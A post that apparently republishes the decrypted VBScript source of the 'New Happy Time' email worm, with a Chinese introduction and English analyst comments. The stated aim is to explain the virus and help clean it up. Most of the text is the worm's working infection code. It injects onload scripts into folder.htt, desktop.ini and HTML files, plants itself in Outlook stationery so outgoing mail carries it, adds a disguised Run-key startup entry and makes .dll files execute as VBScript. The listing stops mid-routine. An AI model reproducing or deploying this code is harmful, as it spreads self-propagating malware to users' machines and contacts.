//新快乐时光只感染 desktop.ini、folder.htt 文件,很简单,但是会造成系统速度快速降低,大量消耗资源,并且由于病毒写得蹩脚,有时还会产生错误。这个病毒是经过加密处理的,我几经查阅,将乱码翻译出来,请大家彻底看穿这个病毒。这里把代码贴出来,有什么不对的地方请提出。wang9658@263.net
' Script-wide state shared by every routine in this listing. Nothing in this
' excerpt assigns most of these; presumably kjsetdim() does (not visible here).
'   inwhere            - compared against "html" in kjcreatemail
'   htmltext, vbstext  - text blocks that kjappendto writes into target files
'   fso                - used for opentextfile / fileexists / getfile / copyfile
'   wsshell            - used for regread / regwrite
'   winpath            - path prefix; its first 3 characters are used as a drive root
'   sube               - reset to 0 in kjchangesub
'   finalydisk         - drive letter used by kjchangesub
'   degreesign, appleobject - not referenced in this excerpt
dim inwhere,htmltext,vbstext,degreesign,appleobject,fso,wsshell,winpath,sube,finalydisk
' Entry point. This is the routine named in the body-onload handlers written by
' kjappendto/kjcreatemail, and its name doubles as the "already modified" marker.
' It runs the stages in a fixed order. kjsetdim, kjlikeit and kjpropagate are
' defined outside this excerpt, so their behavior is not described here.
sub kj_start()
kjsetdim()
' registry and folder-template changes
kjcreatemilieu()
kjlikeit()
' Outlook / Outlook Express stationery changes
kjcreatemail()
kjpropagate()
end sub
' Modifies one file so that it carries the script.
'   filepath - file to modify
'   typestr  - "htt", "html" or "vbs"; any other value opens the file for
'              append but writes nothing
' Analyst note: the literal string kj_start() is the marker this routine itself
' checks for, so it is a usable search string when triaging .htt/.html/.vbs files.
function kjappendto(filepath,typestr)
' Errors are suppressed. If the open or read fails, tmpstr stays empty and the
' length check below makes the routine return without writing.
on error resume next
' mode 1 = open for reading
set readtemp = fso.opentextfile(filepath,1)
tmpstr = readtemp.readall
' Skip files that already contain the marker, and empty files.
if instr(tmpstr,"kj_start()") <> 0 or len(tmpstr) < 1 then
readtemp.close
exit function
end if
if typestr = "htt" then
readtemp.close
' mode 2 = open for writing: the file is rewritten as
' <body onload> tag + original content + htmltext
set filetemp = fso.opentextfile(filepath,2)
filetemp.write "<" & "body onload=""" & "vbscript:" & "kj_start()""" & ">" & vbcrlf & tmpstr & vbcrlf & htmltext
filetemp.close
set fattrib = fso.getfile(filepath)
' 34 = Hidden (2) + Archive (32)
fattrib.attributes = 34
else
readtemp.close
' mode 8 = open for appending: original content is kept and text is added at the end
set filetemp = fso.opentextfile(filepath,8)
if typestr = "html" then
filetemp.write vbcrlf & "<" & "html>" & vbcrlf & "<" & "body onload=""" & "vbscript:" & "kj_start()""" & ">" & vbcrlf & htmltext
elseif typestr = "vbs" then
filetemp.write vbcrlf & vbstext
end if
filetemp.close
end if
end function
' Returns the next path string derived from currentstring.
'   currentstring - a path string; only its first character is inspected when
'                   lastindexchar is 0
'   lastindexchar - 0 means "move to another drive"; otherwise the number of
'                   leading characters of currentstring to keep
' Presumably part of a directory walk driven by a caller outside this excerpt;
' confirm against that caller.
function kjchangesub(currentstring,lastindexchar)
if lastindexchar = 0 then
' First letter at or below "c": wrap around to the drive letter in finalydisk.
if left(lcase(currentstring),1) =< lcase("c") then
kjchangesub = finalydisk & ":\"
sube = 0
else
' Otherwise step down one drive letter (for example e -> d).
kjchangesub = chr(asc(left(lcase(currentstring),1)) - 1) & ":\"
sube = 0
end if
else
' Keep the first lastindexchar characters of the path.
kjchangesub = mid(currentstring,1,lastindexchar)
end if
end function
' Plants the script in the shared stationery file blank.htm and writes Outlook
' Express / Outlook registry values that refer to that stationery.
' Does nothing when inwhere = "html".
' Analyst note: every registry value written below, and blank.htm itself, is
' something to inspect and restore during cleanup. kjmailreg and kjummagefolder
' are defined outside this excerpt; from the call sites kjmailreg takes a
' registry value path and the data for it - confirm against its definition.
function kjcreatemail()
' Errors are suppressed, so a failed regread leaves its variable empty and the
' later writes still run with an incomplete key path.
on error resume next
if inwhere = "html" then
exit function
end if
' left(winpath,3) is the drive root of winpath, e.g. "c:\"
sharefile = left(winpath,3) & "program files\common files\microsoft shared\stationery\blank.htm"
if (fso.fileexists(sharefile)) then
call kjappendto(sharefile,"html")
else
' File is absent: create it (mode 2 with create = true) containing only the
' onload tag and htmltext.
set filetemp = fso.opentextfile(sharefile,2,true)
filetemp.write "<" & "html>" & vbcrlf & "<" & "body onload=""" & "vbscript:" & "kj_start()""" & ">" & vbcrlf & htmltext
filetemp.close
end if
' Outlook Express: look up the default identity and the major version, then
' enable "compose use stationery" and point both stationery names at sharefile.
defaultid = wsshell.regread("hkey_current_user\identities\default user id")
outlookversion = wsshell.regread("hkey_local_machine\software\microsoft\outlook express\mediaver")
wsshell.regwrite "hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion,1) &".0\mail\compose use stationery",1,"reg_dword"
call kjmailreg("hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion,1) &".0\mail\stationery name",sharefile)
call kjmailreg("hkey_current_user\identities\"&defaultid&"\software\microsoft\outlook express\"& left(outlookversion,1) &".0\mail\wide stationery name",sharefile)
' Outlook under Office 9.0: editorpreference is set to 131072 (presumably the
' HTML editor - verify), and the profile value 001e0360 is set to "blank".
wsshell.regwrite "hkey_current_user\software\microsoft\office\9.0\outlook\options\mail\editorpreference",131072,"reg_dword"
call kjmailreg("hkey_current_user\software\microsoft\windows messaging subsystem\profiles\microsoft outlook internet settings\0a0d020000000000c000000000000046\001e0360","blank")
call kjmailreg("hkey_current_user\software\microsoft\windows nt\currentversion\windows messaging subsystem\profiles\microsoft outlook internet settings\0a0d020000000000c000000000000046\001e0360","blank")
' Outlook under Office 10.0: same editor preference, plus newstationery = "blank".
wsshell.regwrite "hkey_current_user\software\microsoft\office\10.0\outlook\options\mail\editorpreference",131072,"reg_dword"
call kjmailreg("hkey_current_user\software\microsoft\office\10.0\common\mailsettings\newstationery","blank")
' Hands the whole stationery folder to kjummagefolder (not visible here).
kjummagefolder(left(winpath,3) & "program files\common files\microsoft shared\stationery")
end function
function kjcreatemilieu()
on error resume next
temppath = ""
if not(fso.fileexists(winpath & "wscript.exe")) then
temppath = "system32\"
end if
if temppath = "system32\" then
startupfile = winpath & "system\kernel32.dll"
else
startupfile = winpath & "system\kernel.dll"
end if
wsshell.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\run\kernel32",startupfile
fso.copyfile winpath & "web\kjwall.gif",winpath & "web\folder.htt"
fso.copyfile winpath & "system32\kjwall.gif",winpath & "system32\desktop.ini"
call kjappendto(winpath & "web\folder.htt","htt")
wsshell.regwrite "hkey_classes_root\.dll\","dllfile"
wsshell.regwrite "hkey_classes_root\.dll\content type","application/x-msdownload"
wsshell.regwrite "hkey_classes_root\dllfile\defaulticon\",wsshell.regread("hkey_classes_root\vxdfile\defaulticon\")
wsshell.regwrite "hkey_classes_root\dllfile\scriptengine\","vbscript"